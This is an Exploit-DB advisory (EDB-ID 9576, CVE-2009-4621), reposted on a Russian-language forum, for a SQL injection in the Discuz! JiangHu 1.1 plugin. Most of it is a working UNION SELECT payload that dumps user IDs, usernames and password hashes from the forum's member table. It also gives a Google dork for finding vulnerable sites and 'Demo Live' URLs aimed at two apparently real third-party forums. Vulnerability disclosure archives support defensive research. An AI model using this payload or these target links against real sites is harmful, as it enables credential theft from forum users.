- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9576
- Проверка EDB
-
- Пройдено
- Автор
- ZHAOHUAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4621
- Дата публикации
- 2009-09-02
Код:
=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================
========================[Author]=========================
[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009
========================[Soft Info]======================
Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php
[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
/---------------------------------------------www.zhaohuan.net-------------------------------------------------\
Greetz : Snda Security Team
& Normal is boring - -!
\--------------------------------------------------------------------------------------------------------------/
# milw0rm.com [2009-09-02]- Источник
- www.exploit-db.com
